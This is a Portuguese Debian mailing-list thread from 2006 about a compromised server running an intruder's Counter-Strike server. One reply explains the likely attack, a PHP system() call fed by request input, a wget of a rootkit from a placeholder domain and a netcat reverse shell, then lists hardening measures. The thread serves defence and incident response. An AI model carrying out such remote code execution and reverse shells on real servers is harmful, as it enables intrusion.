Re: Invasão... Cstrike
Varios sao os motivos:
Imagina o seguitne, um exemplo bemmmm besta, e bemmm looser, nunca faca isso :)
imagine q vc tem um php q execute uma chamada system
e o comando vem de um get ou de um post , e vc tem register_globals = on no seu php.ini
pronto, o cara pode ver este seu script e executar qq comando na sua maquina...
vamos supor ainda, q o cara executou um wget http://ksjdaskljskla.com/rootkit.tar.gz pra dentro do seu dir /tmp
depois descompactou, e rodou um netcat, ou um bot de IRC
no caso com o netcat ele poderia estabelecer uma conexao com uma maquina dele ex:
MAQUINA DO CARA Seu servidor, saindo com o netcat pra porta 80 do cara...
OUVINDO NA PORTA 80 <<<<<============
COM O NETCAT
no caso acima o cara jah pega shell na maquina... mas vc ainda consegue ver onde ele mandou seu server
se conectar para ele pegar a shell...
mas se o cara iniciou um bot de irc por ex na sua maquina, e este bot
se conecta a qq rede de irc, ele pode entrar na rede de irc e mandar comandos pro seu server
atravez deste bot...
o que fazer pra evitar isso ?
sao varias as opcoes, depende da usabilidade q precisa:
1- apt-get install bastille
Edite o script de firewall dele, e siga as instrucoes para habilitar o controle
de saida do firewall.
Assim, se o cara tentar baixar algum arquivo ou fazer um fopen de um stream ftp/http q seja, ele nao vai conseguir...
Habilitar isso eh BEEEEM chato, pois sempre q vc precisar fazer um include de um stream precisa ter a regra no firewall do bastille, alem de ter q colocar os ips da sua rede, de servers NTP, dos sources do debian etc.
2 - instale o mod_security e configure para as suas necessidades
ele jah vem com algumas regras q vc pode habilitar, distribuidas em 3 nives de 'paranoia'
3 - aplique o patch do grsecurity no seu kernel, fica 'duca', vc sabe absolutamente tdo q ocorre na maquina, e pode controlar
tdo com o PAX por ex.
4 - coloque algum auditor de arquivos (tripwire por ex) e grave o banco de dados dele em um CD-R, para evitar q banco de dados dele seja alterado.
5 - seja rigoroso com as permissoes de arquivos
6 - desligue o register_globals do php.ini
7 - LIGUE o safe_mode do php.ini
isso tdo jah da um talento legal...
as 3 ultimas sao as mais simples, e mais faceis de implementar.
abracos
----- Original Message ----
From: "wpqa@credicardciti.com.br" <wpqa@credicardciti.com.br>
To: Vinicius Andrade Marino <vinicius777@gmail.com>
Cc: debian-user-portuguese@lists.debian.org
Sent: Monday, November 13, 2006 4:19:21 PM
Subject: Re:Invasão... Cstrike
Opa! Fiquei curioso, não opiniei até agora por desconhecer alguma forma de auxiliar, mas, pq o uso do PHP no WEBServer(Apache) pode permitir isto? O quê deveria ser travado?
Wagner Eduardo Bidin
Credicard Banco S/A
VP Controles Internos
WPQA
55 11 3047.9089
wpqa@credicard.com.br
Vinicius Andrade Marino <vinicius777@gmail.com> 13/11/2006 13:47
To
debian-user-portuguese@lists.debian.org cc
Subject
Re: Invasão... Cstrike
Pelo o que pude notar o invasor conseguiu acesso por web !
apenas me diga isso...
Qual aplicação roda no web-server ?(aposto que seria um php!)
Qual versão do kernel está rodando atualmente ?
E se caso lhe interesse passar as dores de cabeça faça assim:
procure o log de acesso do apache e filtre o conteudo assim.
cat access_log |grep cmd= |less
logo descubrirá o conteudo e tente executar você mesmo !
Em Segunda 13 Novembro 2006 14:39, Paulo de Souza Lima escreveu:
> É bão tb. :-)
>
> Paulo de Souza Lima
> Curitiba/PR
> Linux User 432358
>
> ----- Mensagem original ----
> De: Anacleto Pavão <anacletopavao@yahoo.com.br>
> Para: Paulo de Souza Lima <paulocwb2003@yahoo.com.br>; Lista Debian
> <debian-user-portuguese@lists.debian.org> Enviadas: Segunda-feira, 13 de
> Novembro de 2006 11:29:20
> Assunto: Re: Invasão... Cstrike
>
> Nao seria interessante instalar e configurar o SNORT?
>
> Paulo de Souza Lima <paulocwb2003@yahoo.com.br> escreveu: A maioria
> das invasões são facilitadas por pessoas ou equipamentos dentro da empresa.
>
> Sugiro que você verifique se há algum desktop infectado, pois ele pode
> estar monitorando a rede de alguma outra máquina. Outra boa idéia é fazer a
> varredura pesada das portas de fora para dentro e de dentro para fora com o
> nmap (de fora pra dentro você vai ter de pedir para alguém fazer). Também é
> uma boa idéia copiar os logs para outra máquina. Outra coisa: vc tem
> certeza de que sua rede não tem backdoors (como acessos adsl ou discados
> que não passem pelo firewall, ou ainda, mais de um IP externo no firewall)?
>
> Me esclarece uma coisa: Ele instalou esse servidor de Counter Strike no
> firewall ou num servidor interno à rede?
>
> Abraços,
>
> Paulo de Souza Lima
> Curitiba/PR
> Linux User 432358
>
> ----- Mensagem original ----
> De: Daniel <da_picon@yahoo.com.br>
> Para: Lista Debian <debian-user-portuguese@lists.debian.org>
> Enviadas: Segunda-feira, 13 de Novembro de 2006 9:38:19
> Assunto: Invasão... Cstrike
>
> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, > div.MsoNormal > {margin:0cm;margin-bottom:.0001pt;font-size:12.0pt;font-family:"Times New > Roman";}a:link, span.MsoHyperlink > {color:blue;text-decoration:underline;}a:visited, span.MsoHyperlinkFollowed > {color:purple;text-decoration:underline;} span.EstiloDeEmail17 > {font-family:Arial;color:windowtext;}_filtered {margin:70.85pt 3.0cm > 70.85pt 3.0cm;}div.Section1 {}--> Olá pessoal.
>
> Estou com um problema sério em minha rede.
> Semana passada estava dando uma olhada nos logs como de costume e vi que
> o log de saída estava enorme (2 Gb). Fui investigar e vi que alguém invadiu
> o meu server e criou um servidor de jogo Counter Strike nele. O Engraçado é
> que as únicas portas abertas de entrada são a 80 e uma de ssh alternativa.
>
> Bom, tentei vasculhar como o cara entrou, mas não encontrei nada.
> Resolvi refazer o servidor todo. (2 dias de trabalho). Bom, voltei do final
> de semana e lá estava tudo de novo. Não consigo entender como o cara
> entrou, formatei a máquina, mudei as senhas, tem apenas as duas portas
> abertas, mas ta tudo lá. O Login e root está desabilitado para ssh...
> enfim, não sei o que o cara fez. E pra piorar, o desgraçado apagou os logs
> todos.
>
> Alguém já passou por algo do tipo, com esses servers de counter strike?
> Há algo padrão a se fazer?
> Estou completamente perdido, qualquer dica, ajuda, sei lá, seria bem
> vindo.
>
> Grato a todos
>
> Daniel
>
>
>
>
>
>
>
>
>
> O Yahoo! está de cara nova. Venha conferir!
>
>
>
> Yahoo! Acesso Grátis - Internet rápida e grátis. Instale o discador agora!
>
>
>
>
>
>
>
> _______________________________________________________
> Novidade no Yahoo! Mail: receba alertas de novas mensagens no seu celular.
> Registre seu aparelho agora! http://br.mobile.yahoo.com/mailalertas/
--
keepTec - Consultoria de Sistemas Linux - +55 (11)95002638 - keeptec@gmail.com
Reply to: